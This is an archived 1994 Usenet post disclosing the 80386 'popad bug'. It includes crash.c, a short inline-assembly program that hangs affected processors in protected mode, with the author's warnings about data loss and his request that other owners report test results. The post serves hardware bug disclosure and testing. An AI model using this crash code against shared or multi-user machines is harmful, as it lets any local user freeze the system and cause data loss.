Return to BSD News archive
Path: sserve!newshost.anu.edu.au!munnari.oz.au!news.Hawaii.Edu!ames!elroy.jpl.nasa.gov!usc!howland.reston.ans.net!agate!msuinfo!harbinger.cc.monash.edu.au!jacobi.maths.monash.edu.au!billm From: billm@jacobi.maths.monash.edu.au (WE Metzenthen) Newsgroups: comp.os.386bsd.development Subject: Serious 80386 bug Date: 24 Feb 1994 04:11:30 GMT Organization: Monash University Lines: 133 Message-ID: <2kh9di$igb@harbinger.cc.monash.edu.au> NNTP-Posting-Host: jacobi.maths.monash.edu.au X-Newsreader: TIN [version 1.2 PL2] [ Article crossposted from comp.os.linux.development ] [ Author was WE Metzenthen ] [ Posted on 24 Feb 1994 04:06:12 GMT ] Running 'crashme' on my Linux system for a few hours caused my machine to hang. After a few hours of investigation I found the cause. It is due to a serious bug in the microcode of some 80386's. In about July 1989 there was some discussion on the net about the "popad bug" in 80386 processors. It appeared to affect all 80386's (dx or sx, Intel or AMD) but no 80486 was found which had the bug. The bug appeared to be benign in so far as its only bad effect seemed to be to put incorrect contents into the eax register, and there was an easy work-around. All of the discussion at that stage seemed to be concerned with tests done in real mode. From my experiments, the effects of the bug in protected mode appear to be far more serious. It causes my machine to hang. I have not yet been able to discover if the processor is still executing instructions after encountering the offending code. I have attached the code which triggers the bug to the end of this posting. BE AWARE THAT THIS CODE CAN RESULT IN DATA LOSS. It is probably safest to put the code onto ram disk and run it without any physical disks mounted. I have run it a number of times with disks mounted and e2fsck has always been able to do the minor fix-up when I rebooted. At this stage I know of no way to overcome this bug. Unless some magic is found, it appears impossible for the operating system to guard against it. Fortunately, it appears that the probability of accidently triggering the bug is very low. However, any 80386 machine which has this bug should not allow public access where users can run their own code. In response to a related posting yesterday to a hardware group, one user reports that the popad bug exists on an 80386-40, another reports an 80386sx which doesn't have it. Art Boyne <boyne@lvld.hp.com> writes that later versions of the 80386 have the popad bug fixed: > Yes. It is fixed in (at least) the double-sigma step, which I believe > is still the current 386 stepping. These chips are identified by two > sigma signs on the package. It may be helful if owners of 80386 machines who, AFTER TAKING SUITABLE PRECAUTIONS, run the program at the end of this posting would mail the results to me including the age of the 80386 (or post to comp.os.linux.development). Thanks. (My machine uses a 33MHz AMD 80386. The motherboard was manufactured in Jan 1992.) --Bill --------------------------- start of crash.c ------------------------------ /* crash.c A small program to crash 80386 machines. ***************************** NOTE **************************** DO NOT RUN THIS PROGRAM UNLESS YOU ARE WILLING TO ACCEPT POSSIBLE DATA LOSS! W. Metzenthen 23rd Feb 1994. <billm@jacobi.maths.monash.edu.au> This code relies upon a defect in the 80386 microcode, i.e. the so-called "popad bug". A few experiments have been tried. Three components appear to be needed: 1) an operand-size prefix byte, 2) a 'popa' instruction, and 3) a critical instruction immediately after the popa. This may be 'xchgb %al,(%eax)' or similar. This code cannot be debugged with gdb, etc; the bug will go away if an attempt is made to single-step it. None of the following instructions are suitable for use as 3) above (they won't crash the machine): nop movl _x,%eax xchgb %al,%ah xchgb %al,_x xchgb %al,(0) but this is: xchgb %al,0xfffffff6(%eax,8) */ main() { /* Put a valid address into eax, (but not needed). */ asm volatile ("movl %esp,%eax"); /* This is the code which does the damage: */ asm volatile (" .byte 0x66 popa xchgb %al,(%eax) "); #define TRY_RECOVERY #ifdef TRY_RECOVERY /* Possible recovery if the processor has been put into real mode (but doesn't work on my machine): */ asm volatile ("nop; nop; nop; nop; nop; nop /* If in real mode, a far jump to f000:fff0 should cause a re-boot: */ .byte 0xea, 0xf0, 0xff, 0x00, 0xf0 "); #endif TRY_RECOVERY exit(0); /* Just in case the above code doesn't crash the machine */ } ---------------------------- end of crash.c ------------------------------- -- Bill Metzenthen Mathematics Department Monash University Clayton, Victoria, Australia email: billm@vaxc.cc.monash.edu.au billm@euler.maths.monash.edu.au -- Bill Metzenthen Mathematics Department Monash University Clayton, Victoria, Australia email: billm@vaxc.cc.monash.edu.au billm@euler.maths.monash.edu.au